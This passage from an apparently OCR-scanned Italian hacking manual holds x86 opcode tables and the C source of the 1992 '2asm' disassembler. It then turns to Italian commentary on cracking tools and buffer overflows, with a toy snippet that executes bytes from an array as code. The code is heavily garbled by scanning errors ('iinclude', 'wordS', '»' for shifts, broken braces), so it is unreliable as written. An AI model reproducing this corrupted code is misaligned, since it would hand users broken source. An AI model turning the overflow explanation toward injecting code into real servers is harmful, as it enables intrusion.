"frndlnt", "f scale", "fsin", "fcos' 

0, "fucompp", 0, 0, 0, 0, 0, 0 }; 

0, 0, "fclex", "finlt", 0, 0, 0, 0 

"*fadd %GF,st" }; 

"*fmul %GF,st" }; 

"*fsubr %GF,st" }; 

"*fsub %GF,st" }; 

"*fdivr %GF,st" }; 

"*fdlv %GF,st" }; 

"*ffree %GF" ] ; 

"*fst %GF" }; 

"*fstp %GF" }; 

"*fucom %GF" }; 

"*fucomp %GF" }; 

"*faddp %GF,st" }; 

"*fmulp %GF,st" }; 

0, "fcompp", 0, 0, 0, 0, 0, 0 1; 

"*fsubrp %GF,st" }; 

"*fsubp %GF,st" 1; 

"*fdlvrp %GF,st" }; 

"*fdlvp %GF,st" 1; 

"fstsw ax", 0, 0, 0, 0, 0, 0, 0 ] ; 



1; 
}; 



char **f speciali] = { /* 0=use st(i), l=undefined 0 in fop_* means undefined 



*/ 



}; 



0, 0, 0, 0, 0, 0, 0, 0, 

0, fop_9, fop_10, 0, fop_12, fop_13, fop_14, fop_15, 
fO, fO, fO, fO, fO, fop_21, fO, fO, 
fO, fO, fO, fO, fop_28, fO, fO, fO, 

fop_32, fop_33, fO, fO, fop_36, fop_37, fop_38, fop_39, 
fop_40, fO, fop_42, fop_43, fop_44, fop_45, fO, fO, 
fop_48, fop_49, fO, fop_51, fop_52, fop_53, fop_54, fop_55, 
fO, fO, fO, fO, fop_60, fO, fO, fO, 



char *floatops [] = { /* assumed " %EF" at end of each. 
/*00*/ "fadd", "fmul", "fcom", "fcomp", 

"fsub", "fsubr", "fdiv", "fdivr", 
/*08*/ "fld", 0, "fst", "fstp", 

"fldenv", "fldcw", "fstenv", "fstcw", 
/*16*/ "fiadd", "fimul", "ficomw", "ficompw", 

"fisub", "fisubr", "fidiv", "fidivr", 
/*24*/ "fild", 0, "fist", "fistp", 

"frstor", "fldt", 0, "fstpt", 
/*32*/ "faddq", "fmulq", "fcomq", "fcompq", 

"fsubq", "fsubrq", "fdivq", "fdivrq", 
/*40*/ "fldq", 0, "fstq", "fstpq", 

0, 0, "fsave", "fstsw", 
/*48*/ "fiaddw", "fimulw", "ficomw", "ficompw", 

"fisubw", "fisubrw", "fidivw", "fidivr", 
/*56*/ "fildw", 0, "fistw", "fistpw", 

"fbldt", "fildq", "fbstpt", "fistpq" 

1; 



mod != 3 only */ 



Il secondo file è invece il disassemblatore vero e proprio. 
Il file si chiama DISASM.C 

/* 

2asm: Convert binary files to 80*86 assembler. Version 1.00 
License: 

This program is free software; you can redistribute it and/or modify 
it under the terms of the GNU General Public License as published by 
the Free Software Foundation. 
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but WITHOUT ANY WARRANT Y; without even the Implied warranty of 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 
GNU General Public License for more details. 

Comments : 

The code was originally snaffled from the GNU C++ debugger, as ported 
to DOS by DJ Delorie and Kent Williams (williams@herky.cs.uiowa.edu) . 
Extensively modified by Robin Hilliard in Jan and May 1992. 

This source compiles under Turbo C v2 . 01 . The disassembler is entirely 
table driven so it ' s fairly easy to change to suit your own tastes . 

The instruction table has been modified to correspond with that in 
' Programmer ' s Technical Reference: The Processor and Coprocessor ' , 
Robert L. Hummel, Ziff— Davis Press, 1992. Missing (read "undocumented") 
instructions were added and many mistakes and omissions corrected. 

The emulated coprocessor instructions on interrupts 34 — 3E are disassembled 
if the "—e" command line option is specified. I don't deal with segment 
overrides to emulated '87 instructions, read Hummel if you *really* want to 
know ali the gory details (you don't.). The Borland defined shortcuts on 
int 3E are not disassembled either (they're not real instructions anyway!) 

Command line switches (case sensitive) : 

-e : Disassemble (unoverridden) emulated 80*87 instructions (not default) 
-3 : Assume code is 32 bit (default==16) 

—x : Output ali numbers in pure hex (no leading zeros or trailing "h"s.) 

-s : Don't specify operand size (ie omit "byte ptr", "word ptr" and 
"dword ptr" from instruction output. 

-d : Don't specify distance of calls and jumps (near/ far / short) 
(not default) 

Health warning: 

When writing and degbugging this code, I didn't have (and stili don't have) 
a 32-bit disassembler to compare this guy's output with. It's therefore 
quite likely that bugs will appear when disassembling instructions which use 
the 386 and 486 's native 32 bit mode. It seems to work fine in 16 bit mode. 

Any comments/updates/bug reports to: 

Robin Hilliard, Lough Guitane, Killarney, Co. Kerry, Ireland. 
Tel: [+353] 64-54014 

Internet : softloft@iruccvax. ucc. ie 
Compu$erve: 100042, 1237 

If you feel like registering , and possibly get notices of updates and 
other items of software, then send me a post card of your home town. 

Thanks and enjoy! 

*/ 

/* Code starts here. . . */ 

iinclude <stdio.h> 
iinclude <string.h> 
iinclude <setjmp.h> 
iinclude <stdlib.h> 

typedef unsigned long word32; 
typedef unsigned short wordl6; 
typedef unsigned char word8; 
typedef signed long int32; 
typedef signed short intl6; 
typedef signed char int8; 



typedef union ( 
struct { 
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> w; 

word32 dword; 
} WORD32; 



/* variables controlied by command line flags */ 
static int8 seg_size=16; /* default size is 16 */ 

static int8 do_hex = 0; /* default is to use reassemblable instructions */ 
static int8 do^distance = 1; /* default is to use reassemblable instructions */ 
static wordS do_emul87 = 0; /* don't try to disassemble emulated instrcutions */ 
static wordS do_size = 1; /* default to outputting explicit operand size */ 
static wordS must_do_size ; /* used with do^size */ 

static int wordop; /* dealing with word or byte operand */ 

static FILE *infile; /* input stream */ 

static word8 instruction_length; 
static instruction_offset; 

static wordl6 done_space; /* for opcodes with > one space */ 

static wordS patch87 ; /* fudge variable used in 8087 emù patching code */ 

static char ubuf [100] , *ubufp; 



/* output column */ 

/* segment override prefix byte */ 
/* flag for getting modrm byte */ 
/* flag for getting sib byte */ 
/* just like it says ... */ 



static col; 
static prefix; 
static modrmv; 
static sibv; 
static opsize; 
static addrsize ; 

static jmp_buf reached_eof; /* jump back when reached eof */ 



/* some defines for extracting instruction bit fields from bytes */ 



idefine MOD(a) 
idefine REG(a) 
idefine RM(a) 
idefine SCALE (a) 
idefine INDEX (a) 
idefine BASE (a) 



(((a)»6)&7) 
(((a)»3)&7) 
((a)s7) 
(((a)»6)&7) 
(((a)»3)&7) 
((a)&7) 



extern 


char 


*opmapl [] ; 


extern 


char 


*second[] ; 


extern 


char 


*groups[] [8] ; 


extern 


char 


*f0[]; 


extern 


char 


*fop_9[] ; 


extern 


char 


*fop_10[]; 


extern 


char 


*fop_12[]; 


extern 


char 


*fop_13[]; 


extern 


char 


*fop_14[]; 


extern 


char 


*fop__15[]; 


extern 


char 


*fop_21[l; 


extern 


char 


*fop_28[]; 


extern 


char 


*fop_32[]; 


extern 


char 


*fop_33[]; 


extern 


char 


*fop_36[]; 


extern 


char 


*fop_37[]; 


extern 


char 


*fop__38[]; 


extern 


char 


*fop_39[]; 


extern 


char 


*fop_40[]; 


extern 


char 


*fop_42[]; 


extern 


char 


*fop_43[] ; 


extern 


char 


*fop_44[]; 


extern 


char 


*fop_45[]; 


extern 


char 


*fop_48[]; 


extern 


char 


*fop_49[] ; 


extern 


char 


*fop_51 [] ; 


extern 


char 


*fop_52[]; 


extern 


char 


*fop_53[]; 


extern 


char 


*fop_54 U ; 


extern 


char 


*fop_55[]; 


extern 


char 


*fop_60[] ; 


extern 


char 


**f special lì ; 


extern 


char 


*floatops [] ; 



/* stuff from text.c */ 



/* prototypes */ 
static void ua_str (char *) ; 
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static char *addr_to_hex (int32, word8) ; 
static wordS getbyte (void) ; 
static wordS silent_getbyte (void) ; 
static wordS silent_returnbyte (word8 ); 
static modrm(void) ; 
static sib(void); 

static void uprintf (char *, ...); 
static void uputchar (char ) ; 
static int bytes (char ); 

static void outhexfchar , int , int , int , int ) ; 

static void reg_name (int , char ) ; 

static void do_sib (int ) ; 

static void do^modrm (char ) ; 

static void floating_point (int ) ; 

static void per cent (char , char ); 



static char *addr_to_hex (int32 addr, char splitup) 
{ 

static char buffer [11] ; 
WORD 32 adr; 
char hexstr [2] ; 

strcpy (hexstr, do_hex ? "h " : " ") ; 
adr.dword = addr; 
if (splitup) { 

if (adr.w,seg==0 II adr .w . seg==Oxffff) /* ' coz of wraparound */ 

sprint f (buffer, "%04X%s", adr.w.ofs, hexstr); 
else 

spr int f (buffer , "%04X%s : %04X%s" , adr.w.seg, hexstr, adr.w.ofs, hexstr); 
} else { 

if (adr.w.seg==0 II adr .w . seg==Oxffff) /* 'coz of wraparound */ 

spr int f (buffer, "%04X%s", adr.w.ofs, hexstr); 
else 

sprint f (buffer, "%081X%s", addr, hexstr); 

} 

return buffer; 



static word8 getbyte (void) 
{ 

int 16 c; 

c = fgetc (infile) ; 
if (c==EOF) 

longjmp(reached_eof, 1) ; 
printf("%02X", c) ; /* print out byte */ 
col+=2; 

if (patch87) { 

c —= 0x5C; /* fixup second byte in emulated '87 instruction */ 

patch87 = 0; 

) 

instruction length++ ; 
instruction_off Set++ ; 
return c; 



/* used for lookahead */ 

static wordS silent getbyte (void) 

{ 

return fgetc (infile) ; 

} 

/* return byte to input stream */ 
static wordS silent_returnbyte (word8 c) 
{ 

return ungete (c, infile); 

} 
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{ 

if (modrmv == -1) 

modrmv = getbyte () ; 
return modrmv; 

ì 



static sib (void) 
{ 

if (sibv == -1) 

sibv = getbyte (); 
return sibv; 

} 



/* */ 

static void uprintf (char *s, ...) 
{ 

vsprintf (ubufp, s, ...); 
while (*ubufp) 
ubufp++; 

} 



static void uput char (char c) 
{ 

if (c == '\t') { 

if (done_space) { /* don 't tab out if already done so */ 

uput char ( ' '); 
} else { 

done_space = 1; 
do { 

*ubufp++ = ' '; 
} while ( (ubufp-ubuf) % 8); 

} 

} else 

*ubufp++ = c; 
*ubufp = 0; 



/* */ 

static int bytes (char c) 
{ 

switch (c) { 
case 'b ' : 

return 1; 
case ' w ' : 

return 2; 
case ' d ' : 

return 4; 
case ' v ' : 

if (opsize == 32) 
return 4; 

else 

return 2; 

} 

return 0; 



/* */ 

static void outhexfchar subtype, int extend, int optional, int defsize, int sign) 
{ 

int n=0, s=0, i; 
int32 delta; 
unsigned char buff [6] ; 
char *name; 
char signchar; 

switch (subtype) { 
case ' q ' : 
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n = 2; 






} else { 






n = 4; 






} 






} else { 






n = 1; 






} 






break; 




case 


'a ' : 






break; 




case 


'x' : 






extend = 2; 






n = 1; 






break; 




case 


'£>' : 






n = 1; 






break; 




case 


'w' : 






n = 2; 






break; 




case 


'd' : 






n = 4; 






break; 




case 


•s' : 






n = 6; 






break; 




case 


•c' : 




case 


, v , . 






if (defsize == 32) 






n = 4; 






else 






n = 2; 






break; 




case 


'*>'•• 






if (defsize == 32) 






n = 6; 






else 






n = 4; 






s = 1; 






break; 




} 






for 


(i=0; i<n; i++) 




buff[i] = getbyte(); 




for 


(; i<extend; i++) 




buff[i] = (buff[i-l] & 0x80) ? Oxff : 0; 




if (s) { 




uprintf("%02X%02X: ", buff[n-l], buff[n-2]) ; 




n 


-= 2; 




ì 






switch (n) { 




case 


1 : 






delta = * (signed char *)buff; 






break; 




case 


2: 






delta = * (signed int *)buff; 






break; 




case 


4: 






delta = * (signed long *)buff; 






break; 




} 






if (extend > n) { 




if 


(subtype ! = ' x ' ) { 




if ( (long)delta<0) { 






delta = -delta; 






signchar = '—'; 






} else 






signchar = '+'; 




if (delta II ìoptional) 






uprintf (do_hex?"%c%0*lX" : "%c%0*lXh", signchar, do_hex?extend : extend+1 , 


delta) ; 


} 


else { 




if (extend==2) 






delta = (wordl6) delta; 




uprintf (do_hex?"%0.*lX": "%0.*lXh", 2*extend+l, delta); 




/* 


uprintf (do_hex?"%0 . *1X": "%0. *lXh", 2* (do_hex?extend: extend+1) , delta) ; 


*/ 
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if ((n == 4) SS Isign) { 

name = addr_to_hex (delta, 0) ; 
uprintf ( "%s" , name); 
return; 

} 

switch (n) { 
case 1 : 

if (sign SS (char)delta<0) { 

delta = -delta; 

signchar = '-'; 
} else 

signchar = '+'; 
if (sign) 

uprintf (do_hex?"%c%02X" : "%c%03Xh" , signchar, (unsigned char)delta) ; 
else 

uprintf (do_hex?"%02X" : "%03Xh ", (unsigned char) delta) ; 
break; 



case 2: 

if (sign SS (int)delta<0) { 

signchar = '-'; 

delta = -delta; 
} else 

signchar = '+'; 
if (sign) 

uprintf (do_hex?"%c%04X n : "%c%05Xh", signchar, (int)delta) ; 
else 

uprintf (do_hex?"%04X" : "%05Xh", (unsigned int) delta) ; 
break; 



case 4 : 

if (sign SS (long)delta<0) { 

delta = -delta; 

signchar = '-'; 
} else 

signchar = '+'; 
if (sign) 

uprintf (do_hex?"%c%08X" : "%c%091Xh", signchar, (unsigned long)delta); 
else 

uprintf (do_hex?"%08X" : "%091Xh ", (unsigned long) delta) ; 
break; 

} 

} 

/* */ 

static void reg_name (int regnum, char size) 
{ 

if (size == 'F') { /* floating point register? */ 
uprintf ("st (%d) ", regnum) ; 
return; 

) 

if (((size == 'v') SS (opsize == 32)) Il (size == 'd')) 
uputchar ( 'e ' ) ; 

if ((size=='q' Il size == 'b' Il size=='c') SS ìwordop) { 

uputchar ( "acdbacdb " [ regnum ] ) ; 

uputchar ( "llllhhhh " [regnum] ) ; 
} else { 

uputchar ( "acdbsbsd" [regnum] ) ; 

uputchar ( "xxxxppii " [ regnum ] ) ; 

} 

} 



/* */ 

static void do_sib (int m) 
{ 

int s, i, b; 



s = SCALE (sib () ) ; 
i = INDEX (sib () ) ; 
b = BASE ( sib () ) ; 

switch (b) { /* pick base */ 

case 0: ua_str ("%p: [eax") ; break; 
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case 3: ua^str ("%p: [ebx") ; break; 
case 4: ua_str ( "%p : [esp" ) ; break; 
case 5: 

if (m == 0) { 
ua_str("%p: ["); 

outhex('d', 4, 0, addrsize, 0) ; 
} else { 

ua_str ("%p: [ebp") ; 

} 

break; 

case 6: ua_str ("%p: [esi") ; break; 
case 7: ua^str ("%p: [edi") ; break; 
} 

switch (i) { /* and index */ 

case 0: uprintf ("+eax") ; break; 
case 1: uprintf ("+ecx") ; break; 
case 2: uprintf ("+edx") ; break; 
case 3: uprintf ("+ebx") ; break; 
case 4 : break; 

case 5: uprintf ("+ebp") ; break; 
case 6: uprintf ( "+esi") ; break; 
case 7: uprintf ( "+edi") ; break; 
} 

if (i != 4) { 

switch (s) { /* and scale */ 
case 0 : uprintf (""); break; 
case 1: uprintf ("*2") ; break; 
case 2: uprintf ("*4") ; break; 
case 3: uprintf ("*8") ; break; 

} 

} 



/* */ 

static void do_modrm (char subtype) 
{ 

int mod = MOD (modrm () ) ; 
int rm = RM (modrm () ) ; 

int extend = (addrsize == 32) ? 4 : 2; 

if (mod == 3) { /* specifies two registers */ 
reg__name (rm, subtype) ; 
return; 

) 

if (must_do_size) { 
if (wordop) { 

if (addrsize==32 / / opsize==32) { /* then must specify size */ 

ua_str ( "dword ptr ") ; 
} else { 

ua_str ( "word ptr ") ; 

} 

) else { 

ua_str("byte ptr "); 

} 

} 

if ((mod == 0) SS (rm == 5) && (addrsize == 32)) {/* mem operand with 32 bit ofs */ 
ua str ( "%p : [ ") ; 

outhex('d', extend, 0, addrsize, 0) ; 

uputchar ( ' ] ' ) ; 

return; 

} 

if ((mod == 0) SS (rm == 6) && (addrsize == 16)) { /* 16 bit dsplcmnt */ 
ua_str ( "%p : [ ") ; 

outhex('w', extend, 0, addrsize, 0) ; 

uputchar ( ' ] ' ) ; 

return; 

) 

if ((addrsize != 32) Il (rm != 4)) 

ua_str ( "%p : [ ") ; 
if (addrsize == 16) { 

switch (rm) { 

case 0: uprintf ( "bx+si" ) ; break; 
case 1 : uprintf ("bx+di") ; break; 
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case 4: uprintf ("si") ; break; 
case 5: uprintf ( "di") ; break; 
case 6: uprintf ("bp") ; break; 
case 7: uprintf ("bx") ; break; 
) 

} else { 

switch (rm) { 

case 0: uprintf ( "eax") ; break; 
case 1 : uprintf ( "ecx") ; break; 
case 2: uprintf ( "edx") ; break; 
case 3: uprintf ( "ebx") ; break; 
case 4 : do_sib (mod) ; break; 
case 5: uprintf ("ebp") ; break; 
case 6: uprintf ( "esi") ; break; 
case 7: uprintf ("edi") ; break; 
} 

) 

switch (mod) { 
case 1 : 

outhexf'b', extend, 1, addrsize, 0) ; 
break; 
case 2: 

outhexf'v', extend, 1, addrsize, 1) ; 
break; 

} 

uputchar ( ' ] ' ) ; 



/* 

static void floating_point (int el) 
{ 

int esc = el*8 + REG (modrm ( ) ) ; 

if (MOD (modrm () ) == 3) { 
if (f special [esc] ) { 

if (f special [esc] [0] [0] == '*') { 

ua_str (f special [esc] [0]+l); 
} else { 

ua_str (f special [esc] [RM (modrm ( ) ) ] ) ; 

} 

) else { 

ua_str (floatops [esc] ) ; 
ua_str(" %EF ") ; 

} 

} else { 

ua_str (floatops [esc] ) ; 
ua_str(" %EF ") ; 

} 

} 




/* Main table driver 

static void percent (char type, char subtype) 
{ 

int32 vofs; 
char *name; 

int extend = (addrsize == 32) ? 4 : 2; 
char c; 

start : 

switch (type) ( 

case 'A ' : /* direct address */ 

outhex (subtype, extend, 0, addrsize, 0) ; 
break; 



case 'C 



/* reg(r/m) picks control reg */ 



uprintf ("C%d", REG (modrm ())) ; 

mustdo_size = 0; 

break; 
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must_do_size = 0; 




break; 


case 


'E': /* r/m picks operandi */ 




do^modrm (subtype) ; 




break; 


case 


'G': /* reg (r/m) picks register */ 




if (subtype == 'F' ) /* 80*87 operand? */ 




reg^name (RM (modrm () ) , subtype) ; 




else 




reg_name (REG (modrm ()) , subtype) ; 




must__do_size = 0; 




break; 


case 


•I' : /* immed data */ 




outhex (subtype, 0, 0, opsize, 0) ; 




break; 


case 


'J': /* relative IP offset */ 




switch (bytes (subtype) ) { /* sizeof offset value */ 




case 1 : 




vofs = (int8) getbyte () ; 




break; 




case 2: 




vofs = getbyte (); 




vofs += getbyte () «8; 




vofs = (intl6) vofs ; 




break; 




case 4 : 




vofs = (word32) getbyte () ; /* yukì */ 




vofs 1= (word32) getbyte () « 8; 




vofs 1= (word32) getbyte () « 16; 




vofs 1= (word32) getbyte () « 24; 




break; 




} 

name = addr_to_Jiex (vofs+instruction offset, 1) ; 




uprintf ("%s" , name); 




break; 


case 


'K ' : 




if (do_distance==0) 




break; 




switch (subtype) { 




case 'f: 




ua_str ( "far ") ; 




break; 




case ' n ' ; 




ua_str ( "near ") ; 




break; 




case 's': 




ua str ( "short ") ; 




break; 




} 

break; 


case 


'M' : /* r/m picks memory */ 




do modrm (subtype) ; 




break; 


case 


'0': /* offset only */ 




ua str ( " %v. 1 " ) ; 




outhex (subtype, extend, 0, addrsize, 0) ; 




uputchar ( ' ] ' ) ; 




break; 


case 


'P' : /* prefix byte (rh) */ 




ua_str ( "%p : ") ; 




break; 


case 


'R' : /* mod(r/m) picks register */ 




reg_name (REG (modrm () ) , subtype); /* rh */ 




must_do_size = 0; 




break; 


case 


'S': /* reg (r/m) picks segment reg */ 
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uputchar ( ' s ' ) ; 
must_do_size = 0; 
break; 



case ' T ' : 

uprlntf ("tr%d" , REG (modrm ( ) ) ) ; 

must_do_size = 0; 

break; 

case 'X ' : 

uprlntf ("ds: [") ; 
if (addrsize == 32) 

uputchar ( 'e ' ) ; 
uprlntf ("si] ") ; 
break; 

case ' Y' : 

uprlntf ("es: [") ; 
if (addrsize == 32) 

uputchar ( 'e ' ) ; 
uprlntf ("di] ") ; 
break; 

case '2 ' : 

ua_str (secondfgetbyte () ]); 
break; 



/* reg(r/m) picks T reg */ 



/* ds:si type operator */ 



/* es:di type operator */ 



/* old [pop cs] ! now indexes */ 
/* instructions in 386/486 */ 



case g : 

ua_str (groups [subtype- ' 0 ' ] [REG (modrm () ) ] ) ; 
break; 



/* modrm group * subtype ' (0 — 7) */ 



case ' d ' : 

if (opsize == 32) 

uput char ( ' d ' ) ; 
uputchar (subtype) ; 
break; 

case ' w ' : 

if (opsize == 32) 

uputchar (' d' ) ; 
else 

uputchar ( 'w' ) ; 
uputchar (subtype) ; 
break; 

case ' e ' : 

if (opsize == 32) { 
if (subtype == 'w') 

uput char ( ' d ' ) ; 
else { 

uput char ( ' e ' ) ; 
uput char ( subtype) , 

) 

} else 

uputchar (subtype) ; 
break; 



/* sizeof operand==dword? */ 



/* insert explicit size speci fier */ 



/* extended reg name */ 



case 'f: /* '87 opcode */ 

floating_point (subtype- ' 0 ' ) ; 
break; 

case ' j ' : 

if (addrsize==32 II opsize==32) /* both of them?! */ 

uputchar ( 'e ' ) ; 
break; 



case 'p : 



/* prefix byte */ 



switch (subtype) 


{ 


case 


c ' 






case 


d' 






case 


e ' 






case 


f 






case 


sr' 






case 


s ' 







prefix = subtype; 
c = getbyte () ; 
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ua_str (opmapl [c] ) ; 

break; 
case ' : ' : 

if (prefix) 

uprintf ( "ics : ", prefix) ; 

break; 
case ' ' : 

c = getbyte () ; 

wordop = c & 1; 

ua_str (opmapl [c] ) ; 

break; 

} 

break; 

case 's': /* size override */ 

switch (subtype) { 
case 'a' : 

addrsize = 48 - addrsize; 

c = getbyte () ; 

wordop = c & 1; 

ua_str (opmapl [c] ) ; 
/* ua_str (opmapl [getbyte ()]) ; */ 

break; 
case ' o ' : 

opsize = 48 - opsize; 

c = getbyte () ; 

wordop = c & 1; 

ua_str ( opmapl [e]) ; 
/* ua_str (opmapl [getbyte ()]) ; */ 

break; 

} 

break; 

} 

} 



static void ua_str(char *str) 
{ 

int c; 

if (str == 0) { 

uprintf ( "<invalid> ") ; 
return; 

} 

if (strpbrk (str, "CDFGRST") ) /* specifiers for registers=>no size 2b specified */ 

must_do__size = 0; 
while C Ce = *str++) != 0) { 
if (c == '%') { 
c = *str++; 
percent (c, *str++) ; 
) else { 

if (c ==••){ 

uputehar ( ' \t ' ) ; 
} else { 

uputehar (c) ; 

} 

} 

} 

} 



static word8 unassemble (wordl6 ofs) 
{ 

char *str; 
int c, c2; 

printf("%04X ", ofs); 
prefix = 0; 

modrmv = sibv = —1; /* set modrm and sib flags 

opsize = addrsize = seg__size; 
col = 0; 
ubufp = ubuf; 
done_space = 0; 
instruction_length = 0; 
c = getbyte () ; 
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patch87 = 0; 
must_do_size = do__size; 
if (do_emul87) { 

if (c==Oxcd) { /* wanna do emù '87 and —>ing to int? */ 
c2 = silent_getbyte ( ) ; 
if (c2 >= 0x34 && c2 <= 0x3E) 

patch87 = 1; /* emulateci instruction! => must repatch two bytes */ 

silent_returnbyte (c2) ; 
c -= 0x32; 

} 

} 

if ( (str = opmapl [c] ) ==NULL) { /* invalid instruction? */ 

uputchar ( ' d ' ) ; /* then output byte defines */ 

uputchar ( 'b' ) ; 
uputchar ( '\t ' ) ; 

uprintf (do_hex?"%02X" : "%02Xh", c) ; 
} else { 

ua_str (str) ; /* valid instruction */ 

} 

printf("%*s", 15-col, " ") ; 
col = 15 + strlen (ubuf) ; 
do { 

uputchar (' '); 

col++; 
} while (col < 43) ; 
printf("%s\n", ubuf); 
return instruction length; 



static word8 isoption (char c) 
{ 

return (c=='/' Il c=='-<); 

} 



void main(int argc, char *argv[]) 
{ 

wordl6 instr_len; 
wordl6 offset; 
char infilename [80] ; 
char c; 

#if de fined (DEBUG) 

clrscr () ; 
iendif 

*infilename = 0; 
while ( — argc) { 
argv++; 

if (**argv=='?') { 
hip: fprintf (stderr, 

"2ASM Version 1.01 (C) Copyright 1992, Robin Hilliard\n n 
"Converts binary files to 80*86 assembly\n" 
"Usage : \n " 

"\t2asm <file> [-e] [-3] [-x] [-s] [-d]\n n 
"Switches : \n " 

"\t— e : \tDisassemble (unoverridden) emulated 80*87 instructions\n" 
"\t-3 :\tAssume code is 32 bit (default=16) \n" 

"\t— x : \tOutput numbers in pure hex (default is reassemblable)\n" 
"\t—s :\tDon't specify operand size, even where necessary\n" 
"\t-d :\tDon't specify distance short/near/ far jmps and calls" 

); 

exit (1) ; 

) 

if (isoption (**argv) ) { 

while (isoption (**argv) ) { 
nextflag: 

switch (c = * (++*argv) ) { 
case 'e': 

do_emul87 = 1; 
break; 
case '3': 
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case 'x ' ; 

do_hex = 1; 

break; 
case 's': 

do_size = 0; 

break; 
case 'd' : 

do_distance = 0; 

break; 
case '?' : 
case 'H ' : 

goto hip; 

case '§': /* hidden flag in the Loft's programs! */ 

fprintf (stderr, "Last compiled on " TIME ", " DATE ; ; 

exit (1) ; 

default : 

fprintf (stderr , "Unknown option: '— %c ' ", c) ; 
exit (1) ; 

} 

++ *argv; 

} 

} else { /* assume that its a file name */ 
if (*infilename) { 

fprintf (stderr, "Unknown file argument : \"%s\"", *argv) ; 
exit (1) ; 

} 

strcpy (infilename , *argv) ; 

} 

} 

if ( (infile=f open (infilename, "rb") )==NULL) { 
printf ( "Unable to open %s" , infilename) ; 
exit (2) ; 

} 

offset = 0; 

strlwr (infilename) ; 

if (strstr (infilename, ".com")) /* not perfect, fix later */ 

instruction__offset = offset = 0x100; 
if (!setjmp(reached_eof)) { 

do ( 

instr_len = unassemble(offset); 
offset += instrlen; 
) while (instr^len) ; /* whoops, no files > 64k */ 

) 

} 



Gli strumenti da cracker 

Il lato oscuro dell'informatica include al suo interno anche il secondo tipo di attività che 
termina sempre con xxx(king). 

Mi sto riferendo al cracking ovvero alla disciplina mediante la quale è possibile entrare dentro 
ai software che sono eseguiti sui sistemi presi di mira. 

Anche all'interno dell'hacking esistono delle circostanze dove diventa necessario utilizzare 
strumenti da cracker come ad esempio DISASSEMBLATORI e DEBUGGER. 
Vi chiederete il motivo e quindi la risposta è presto detta. 

Il primo motivo è che quando si programma esiste generalmente una distribuzione dei tempi i 
quali possiedono all'incirca le seguenti distribuzioni. 
30% analisi, 30% progettazione e sviluppo e 40% debug. 

In questa ultima fase si analizza il codice scritto e mediante dei debugger si verifica che il 
tutto non possieda problemi che non siano puramente errori di logica. 
Durante quest'attività vengono usati gli strumenti che generalmente utilizzano i crackers e 
precisamente i debuggers. 

Questi normalmente sono all'interno degli stessi linguaggi di sviluppo anche se molte volte 

per una maggiore ottimizzazione del codice si cerca di seguire il codice assemblativo. 

I compilatori di ultima generazione includono gli ottimizzatori che applicano ai programmi i 

metodi più conosciuti indirizzati alla creazione di un codice maggiormente efficiente e 

compatto. 

Un altro scopo per cui l'hacker potrebbe trovarsi nella necessità di utilizzare degli strumenti 
come disassemblatori e debugger è quello riuscire ad accedere ai sistemi software per 
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applicare metodi indirizzati alla gestione di quelle problematiche definite con il termine di 
buffers overflows. 

Dobbiamo fare subito alcune differenze tra quelli che vengono intesi come buffer overflow, in 
quanto quelli classici che vengono trattati dalla maggior parte della documentazione che si 
trova in internet basa lo spianamento rispetto gli inizi dei buffer partendo da quello che è lo 
stack e I' heap. 

Questi metodi di fatto non richiedono nessun tipo di debug dei programmi in quanto 
colpiscono una parte del software che possiede sempre lo stesso indirizzo relativo allo stack 
per cui le metodologie per l'individuazione includono metodi completamente differenti. 
L'analisi in assembler dei programmi è orientata all'individuazione dei buffer statici inseriti 
all'interno dei data segment. 

In ogni caso, come vedremo successivamente, anche il caso dei BO utilizzanti lo stack, in un 
altro modo, usano i debugger e i disassemblatori per la messa a punto degli exploits. 
Rimane sempre una mia convinzione il fatto che un hacker debba avere una grossa 
dimestichezza con quella che è la visione a basso livello dei funzionamenti reaitivi ai 
meccanismi utilizzati. 

Ho introdotto il discorso legato a questi tipi di strumenti rifacendomi ai BO in quanto sono 
sicuramente quelli che dal punto di vista dell'hacker possiedono una visione a più basso 
livello. 

I buffers overflows hanno due scopi e precisamente quello di fare bloccare i sistemi grazie ai 
conosciutissimi meccanismi del "programma incavolato" e quello invece di riuscire ad 
eseguire dei codici inseriti tramite degli input gestiti da programmi che non eseguono 
controlli. 

Abbiamo detto che quando si scrive un programma in un qualsiasi linguaggio questo viene 
tradotto in una parte di codice e in una parte di dati i quali vengono collocati in memoria 
seguendo determinate regole. 

Tutti e due gli elementi, codice e dati, possono essere visti o dumpati come codici 
esadecimali in quanto i dati per se stessi sono numeri ma di fatto anche le istruzioni sono 
gestite mediante la stessa forma. 

Nei capitoli legati alla programmazione assembler abbiamo visto come le varie case 
costruttrici dei processori, in fase di progettazione hanno definito un codice binario costituito 
da molti codici operativi i quali istruiscono la CPU ad eseguire determinate istruzioni. 
Se dovessimo scrivere un programma le sue istruzioni relative ai codici operativi verrebbero 
collocati all'interno dei segmenti di codice. 

Lo stesso dicasi per i dati definiti nell'ambito dello stesso programma. 
Questi verrebbero allocati dentro ai dei segmenti di codice. 

Chiaramente stiamo parlando di dati statici in quanto abbiamo visto come le variabili locali 
alle funzioni vengono generalmente allocate dentro al segmento di stack. 
Per fare capire come di fatto il processore diversifica il "numero" trovato in una locazione di 
memoria attribuendogli il senso di "istruzione", e quindi considerandola eseguibile, oppure 
quello di dato, possiamo vedere l'esempio che segue. 

Di fatto il registro relativo all'instruction pointer (IP) che si trova nella CPU è quello che fa si 
che il processore identifichi come istruzione il valore numerico in memoria. 
Nell'esempio che adesso riporterò verrà eseguita un operazione atipica. 
In altre parole viene definito un array dove dentro a questo vengono messi dei numeri che 
sono costituiti da codici operativi di una programmino visualizzato come codici esadecimali. 
Nella parte di codice questo array viene forzato ad essere visto come se fosse un puntatore 
ad una funzione per cui richiamando questa, i codici dentro all' array verranno eseguiti come 
se questi fossero istruzioni assembler. 

int a[] = { 0x12, 0x23, 0x34, 0x56, 0x78 } ; 

void (*func) () = (void (*)()) &a[0] ; 

void main (void) 
{ 

(*func) (); 

ì 
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Questo vuole solo mostrare che inserendo in memoria dei codici operativi di istruzioni 
assembler queste possono essere eseguite. 

Dicevamo prima che un programma si suddivide in zone di dati e zone di codice. 

Se in qualche modo riuscissimo ad accorgerci che un programma di gestione servers 

eseguisse degli input non controllando la dimensione di questo potremmo calcolare quanti 

BYTES inserire fino all"esecuzione del codice inserendo dinamicamente tramite lo stesso 

input eseguito dal programma i codici relativi all'esecuzione di qualche cosa. 

Ad esempio uno dei più famosi Exploits era legato alla gestione della data fatta da Outlook. 

Quando veniva inviato un messaggio era possibile specificare dopo la data un certo numero 

di bytes contenenti gli OPCODES in esadecimale. 
